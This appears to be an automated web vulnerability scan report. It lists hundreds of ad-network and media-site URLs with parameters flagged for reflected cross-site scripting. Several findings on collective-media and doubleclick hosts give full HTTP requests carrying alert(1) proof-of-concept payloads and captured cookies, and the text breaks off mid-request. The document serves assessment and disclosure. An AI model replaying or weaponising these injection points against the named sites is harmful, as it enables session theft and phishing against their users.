http://ad.turn.com/server/pixel.htm [fpid parameter]
http://ad.turn.com/server/pixel.htm [sp parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536 [click parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536 [name of an arbitrarily supplied request parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.6281025498174131 [click parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778 [click parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778 [name of an arbitrarily supplied request parameter]
http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]
http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]
http://ad.yieldmanager.com/v0/admeld-match [admeld_callback parameter]
http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]
http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]
http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]
http://admeld.adnxs.com/usersync [admeld_callback parameter]
http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]
http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]
http://adnxs.revsci.net/imp [Z parameter]
http://adnxs.revsci.net/imp [s parameter]
http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]
http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]
http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]
http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]
http://adserver.veruta.com/cookiematch.fcgi [admeld_adprovider_id parameter]
http://adserver.veruta.com/cookiematch.fcgi [admeld_callback parameter]
http://api.bizographics.com/v1/profile.redirect [api_key parameter]
http://api.bizographics.com/v1/profile.redirect [callback_url parameter]
http://api.dimestore.com/viapi [id parameter]
http://api.mixpanel.com/track/ [callback parameter]
http://ar.voicefive.com/b/rc.pli [func parameter]
http://as.jivox.com/player/iabplayer.php [clickTagURL parameter]
http://as.jivox.com/player/jivox_ad_tags.php [adThumbnail parameter]
http://as.jivox.com/player/jivox_ad_tags.php [adThumbnail parameter]
http://as.jivox.com/player/jivox_ad_tags.php [adVideoURL parameter]
http://as.jivox.com/player/jivox_ad_tags.php [autoPlay parameter]
http://as.jivox.com/player/jivox_ad_tags.php [campaignId parameter]
http://as.jivox.com/player/jivox_ad_tags.php [clickTagURL parameter]
http://as.jivox.com/player/jivox_ad_tags.php [clickTagURL parameter]
http://as.jivox.com/player/jivox_ad_tags.php [iframeTag parameter]
http://as.jivox.com/player/jivox_ad_tags.php [jivoxBranded parameter]
http://as.jivox.com/player/jivox_ad_tags.php [maxAds parameter]
http://as.jivox.com/player/jivox_ad_tags.php [mouseAction parameter]
http://as.jivox.com/player/jivox_ad_tags.php [name of an arbitrarily supplied request parameter]
http://as.jivox.com/player/jivox_ad_tags.php [objectName parameter]
http://as.jivox.com/player/jivox_ad_tags.php [objectName parameter]
http://as.jivox.com/player/jivox_ad_tags.php [objectName parameter]
http://as.jivox.com/player/jivox_ad_tags.php [pauseBetweenAds parameter]
http://as.jivox.com/player/jivox_ad_tags.php [r parameter]
http://as.jivox.com/player/jivox_ad_tags.php [reportingURL parameter]
http://as.jivox.com/player/jivox_ad_tags.php [restartOnUnmute parameter]
http://as.jivox.com/player/jivox_ad_tags.php [serverName parameter]
http://as.jivox.com/player/jivox_ad_tags.php [serverURL parameter]
http://as.jivox.com/player/jivox_ad_tags.php [siteId parameter]
http://as.jivox.com/player/jivox_ad_tags.php [t parameter]
http://as.jivox.com/player/jivox_ad_tags.php [volume parameter]
http://as.jivox.com/player/jivox_ad_tags.php [volumeInitAction parameter]
http://as.jivox.com/unit/jivox_unit_tags.php [campaignId parameter]
http://as.jivox.com/unit/jivox_unit_tags.php [creativeUnitType parameter]
http://as.jivox.com/unit/jivox_unit_tags.php [expandUnitType parameter]
http://as.jivox.com/unit/jivox_unit_tags.php [expandUnitType parameter]
http://as.jivox.com/unit/jivox_unit_tags.php [mouseAction parameter]
http://as.jivox.com/unit/jivox_unit_tags.php [name of an arbitrarily supplied request parameter]
http://as.jivox.com/unit/jivox_unit_tags.php [objectName parameter]
http://as.jivox.com/unit/jivox_unit_tags.php [objectName parameter]
http://as.jivox.com/unit/jivox_unit_tags.php [siteId parameter]
http://b.scorecardresearch.com/beacon.js [c1 parameter]
http://b.scorecardresearch.com/beacon.js [c15 parameter]
http://b.scorecardresearch.com/beacon.js [c2 parameter]
http://b.scorecardresearch.com/beacon.js [c3 parameter]
http://b.scorecardresearch.com/beacon.js [c4 parameter]
http://b.scorecardresearch.com/beacon.js [c5 parameter]
http://b.scorecardresearch.com/beacon.js [c6 parameter]
http://ct.buzzfeed.com/wd/UserWidget [or parameter]
http://ct.buzzfeed.com/wd/UserWidget [u parameter]
http://d.chango.com/collector/admeldpixel [admeld_adprovider_id parameter]
http://d.chango.com/collector/admeldpixel [admeld_callback parameter]
http://d.chango.com/collector/admeldpixel [admeld_callback parameter]
http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [$ parameter]
http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [$ parameter]
http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [q parameter]
http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [q parameter]
http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [$ parameter]
http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [$ parameter]
http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [q parameter]
http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [q parameter]
http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/ [callback parameter]
http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/Usage [callback parameter]
http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/UI/ShareService/Services [callback parameter]
http://digg.com/tools/diggthis.js [REST URL parameter 1]
http://digg.com/tools/diggthis.js [REST URL parameter 2]
http://event.adxpose.com/event.flow [uid parameter]
http://fonts.gawker.com/k/zvc4iwz-e.css [REST URL parameter 1]
http://fonts.gawker.com/k/zvc4iwz-e.css [REST URL parameter 2]
http://geo.gorillanation.com/geo.php [name of an arbitrarily supplied request parameter]
http://geo.gorillanation.com/geo.php [website_id parameter]
http://hollywoodcrush.mtv.com/favicon.ico [REST URL parameter 1]
http://ib.adnxs.com/ab [ccd parameter]
http://ib.adnxs.com/ptj [redir parameter]
http://idolator.com/ifb/audience-science.html [REST URL parameter 1]
http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js [REST URL parameter 1]
http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js [REST URL parameter 2]
http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js [REST URL parameter 3]
http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js [REST URL parameter 4]
http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js [REST URL parameter 5]
http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js [REST URL parameter 1]
http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js [REST URL parameter 2]
http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js [REST URL parameter 3]
http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js [REST URL parameter 4]
http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js [REST URL parameter 5]
http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js [REST URL parameter 1]
http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js [REST URL parameter 2]
http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js [REST URL parameter 3]
http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js [REST URL parameter 4]
http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js [REST URL parameter 5]
http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php [REST URL parameter 1]
http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php [REST URL parameter 2]
http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php [REST URL parameter 3]
http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php [REST URL parameter 4]
http://idolator.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 1]
http://idolator.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 2]
http://idolator.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 3]
http://idolator.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 4]
http://idolator.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 1]
http://idolator.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 2]
http://idolator.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 3]
http://idolator.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 4]
http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js [REST URL parameter 1]
http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js [REST URL parameter 2]
http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js [REST URL parameter 3]
http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js [REST URL parameter 4]
http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js [REST URL parameter 5]
http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf [REST URL parameter 1]
http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf [REST URL parameter 2]
http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf [REST URL parameter 3]
http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf [REST URL parameter 4]
http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf [REST URL parameter 5]
http://idolator.com/wp-content/themes/idolator_1.5/images/favicon.ico [REST URL parameter 1]
http://idolator.com/wp-content/themes/idolator_1.5/images/favicon.ico [REST URL parameter 2]
http://idolator.com/wp-content/themes/idolator_1.5/images/favicon.ico [REST URL parameter 3]
http://idolator.com/wp-content/themes/idolator_1.5/images/favicon.ico [REST URL parameter 4]
http://idolator.com/wp-content/themes/idolator_1.5/images/favicon.ico [REST URL parameter 5]
http://idolator.com/wp-content/themes/idolator_1.5/js/functions.js [REST URL parameter 1]
http://idolator.com/wp-content/themes/idolator_1.5/js/functions.js [REST URL parameter 2]
http://idolator.com/wp-content/themes/idolator_1.5/js/functions.js [REST URL parameter 3]
http://idolator.com/wp-content/themes/idolator_1.5/js/functions.js [REST URL parameter 4]
http://idolator.com/wp-content/themes/idolator_1.5/js/functions.js [REST URL parameter 5]
http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js [REST URL parameter 1]
http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js [REST URL parameter 2]
http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js [REST URL parameter 3]
http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js [REST URL parameter 4]
http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js [REST URL parameter 5]
http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/login-with-ajax.js [REST URL parameter 6]
http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css [REST URL parameter 1]
http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css [REST URL parameter 2]
http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css [REST URL parameter 3]
http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css [REST URL parameter 4]
http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css [REST URL parameter 5]
http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css [REST URL parameter 6]
http://idolator.com/wp-includes/js/comment-reply.js [REST URL parameter 1]
http://idolator.com/wp-includes/js/comment-reply.js [REST URL parameter 2]
http://idolator.com/wp-includes/js/comment-reply.js [REST URL parameter 3]
http://img.mediaplex.com/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js [mpck parameter]
http://img.mediaplex.com/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js [mpck parameter]
http://img.mediaplex.com/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js [mpjs parameter]
http://img.mediaplex.com/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js [mpvc parameter]
http://img.mediaplex.com/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js [mpvc parameter]
http://img.mediaplex.com/content/0/14302/119028/clean_mycustomers_728x90.js [mpck parameter]
http://img.mediaplex.com/content/0/14302/119028/clean_mycustomers_728x90.js [mpvc parameter]
http://img.mediaplex.com/content/0/14302/119028/clean_mycustomers_728x90.js [placementid parameter]
http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js [mpck parameter]
http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js [mpt parameter]
http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js [mpvc parameter]
http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js [mpck parameter]
http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js [mpt parameter]
http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js [mpvc parameter]
http://js.revsci.net/gateway/gw.js [csid parameter]
http://k.collective-media.net/cmadj/cm.mtv/ent_010111 [REST URL parameter 2]
http://k.collective-media.net/cmadj/cm.mtv/ent_010111 [sz parameter]
http://kotaku.com/static/ad_iframe.php [rand parameter]
http://kotaku.com/static/ad_iframe.php [script_url parameter]
http://media.photobucket.com/image/recent/Smirk_Dog/GIFS/MacSigDance.gif [REST URL parameter 4]
http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/ [REST URL parameter 1]
http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/ [REST URL parameter 2]
http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/ [REST URL parameter 3]
http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/ [REST URL parameter 4]
http://moviesblog.mtv.com/favicon.ico [REST URL parameter 1]
http://ox-d.sbnation.com/w/1.0/ajs [o parameter]
http://pglb.buzzfed.com/63975/3848554c08824c2e6b4e5963f6d2d7e2 [callback parameter]
http://pglb.buzzfed.com/83240/6ff44b0268185d901ef2d93cd3d3a48f [callback parameter]
http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]
http://s26.sitemeter.com/js/counter.asp [site parameter]
http://s26.sitemeter.com/js/counter.js [site parameter]
http://s46.sitemeter.com/js/counter.js [site parameter]
http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]
http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]
http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]
http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]
http://thesouthern.com/app/port/bulkCommentCount.php [REST URL parameter 1]
http://thesouthern.com/app/weather/qwikcast_feed0.xml [REST URL parameter 1]
http://thesouthern.com/favicon.ico [REST URL parameter 1]
http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html [REST URL parameter 1]
http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html [REST URL parameter 2]
http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html [REST URL parameter 3]
http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html [name of an arbitrarily supplied request parameter]
http://tvfanatic.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]
http://um.simpli.fi/am_js.js [admeld_adprovider_id parameter]
http://um.simpli.fi/am_js.js [admeld_callback parameter]
http://um.simpli.fi/am_match [admeld_adprovider_id parameter]
http://um.simpli.fi/am_match [admeld_callback parameter]
http://um.simpli.fi/am_redirect_js [admeld_adprovider_id parameter]
http://um.simpli.fi/am_redirect_js [admeld_callback parameter]
http://widgets.digg.com/buttons/count [url parameter]
http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx [host parameter]
http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx [host parameter]
http://www.lijit.com/delivery/fp [n parameter]
http://www.mtv.com/global/music/scripts/reportFluxView.jhtml [uri parameter]
http://www.mtv.com/global/music/scripts/reportFluxView.jhtml [uri parameter]
http://www.paperg.com/jsfb/embed.php [bid parameter]
http://www.tvfanatic.com/favicon.ico [REST URL parameter 1]
http://www2.glam.com/app/site/affiliate/viewChannelModule.act [adSize parameter]
http://www24a.glam.com/appdir/getscript.jsp [view parameter]
http://www35.glam.com/gad/glamadapt_jsrv.act [;flg parameter]
http://www35.glam.com/gad/glamadapt_jsrv.act [name of an arbitrarily supplied request parameter]
http://adnxs.revsci.net/imp [Referer HTTP header]
http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]
http://ar.voicefive.com/bmx3/broker.pli [BMX_BR cookie]
http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]
http://ar.voicefive.com/bmx3/broker.pli [UID cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p101866669 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p101945457 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p20101109 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p56282763 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p91143664 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]
http://d.chango.com/collector/admeldpixel [_t cookie]
http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [ZEDOIDA cookie]
http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [ZEDOIDA cookie]
http://k.collective-media.net/cmadj/cm.mtv/ent_010111 [cli cookie]
http://k.collective-media.net/cmadj/cm.mtv/ent_010111 [cli cookie]
http://optimized-by.rubiconproject.com/a/5941/13464/26379-2.js [ruid cookie]
http://optimized-by.rubiconproject.com/a/5941/13464/26379-9.js [ruid cookie]
http://s26.sitemeter.com/js/counter.asp [IP cookie]
http://s26.sitemeter.com/js/counter.js [IP cookie]
http://www2.glam.com/app/site/affiliate/viewChannelModule.act [ctags cookie]
http://www2.glam.com/app/site/affiliate/viewChannelModule.act [glam_sid cookie]
http://www2.glam.com/app/site/affiliate/viewChannelModule.act [qcsegs cookie]
http://www35.glam.com/gad/glamadapt_jsrv.act [glam_sid cookie]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

4.1. http://a.collective-media.net/adj/cm.mtv/ent_010111 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.mtv/ent_010111

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7f41'-alert(1)-'77ffbacf38b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/cm.mtvd7f41'-alert(1)-'77ffbacf38b/ent_010111;sz=728x90;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/AFTRSERVER/hserver//acc_random=379297/site=mtv.mtvi/aamsz=728x90//ATCI=1305305557-4079447
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=332jXJ1Pqjj-HqZYNcOZJMDRxyMFbPVXvMReGdRQ2Q3tgRpc00YOW1w; dc=dc

Response

4.2. http://a.collective-media.net/adj/cm.mtv/ent_010111 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.mtv/ent_010111

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a0df'-alert(1)-'ad6b99e809c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/cm.mtv/ent_0101113a0df'-alert(1)-'ad6b99e809c;sz=728x90;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/AFTRSERVER/hserver//acc_random=379297/site=mtv.mtvi/aamsz=728x90//ATCI=1305305557-4079447
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=332jXJ1Pqjj-HqZYNcOZJMDRxyMFbPVXvMReGdRQ2Q3tgRpc00YOW1w; dc=dc

Response

4.3. http://a.collective-media.net/adj/cm.mtv/ent_010111 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.mtv/ent_010111

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84af9'-alert(1)-'86aaccb8509 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/cm.mtv/ent_010111;sz=728x90;ord=[timestamp]?&84af9'-alert(1)-'86aaccb8509=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/AFTRSERVER/hserver//acc_random=379297/site=mtv.mtvi/aamsz=728x90//ATCI=1305305557-4079447
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=332jXJ1Pqjj-HqZYNcOZJMDRxyMFbPVXvMReGdRQ2Q3tgRpc00YOW1w; dc=dc

Response

4.4. http://a.collective-media.net/adj/cm.mtv/ent_010111 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.mtv/ent_010111

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f097'-alert(1)-'a07a6cc0580 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/cm.mtv/ent_010111;sz=728x90;ord=[timestamp]?3f097'-alert(1)-'a07a6cc0580 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/AFTRSERVER/hserver//acc_random=379297/site=mtv.mtvi/aamsz=728x90//ATCI=1305305557-4079447
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=332jXJ1Pqjj-HqZYNcOZJMDRxyMFbPVXvMReGdRQ2Q3tgRpc00YOW1w; dc=dc

Response

4.5. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [adurl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1284f"-alert(1)-"841d2a94644 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BxBFZpP_1TbyHBMPhlQex0pyMCafwhJkCr6v7qTXH3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342&adurl=1284f"-alert(1)-"841d2a94644 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
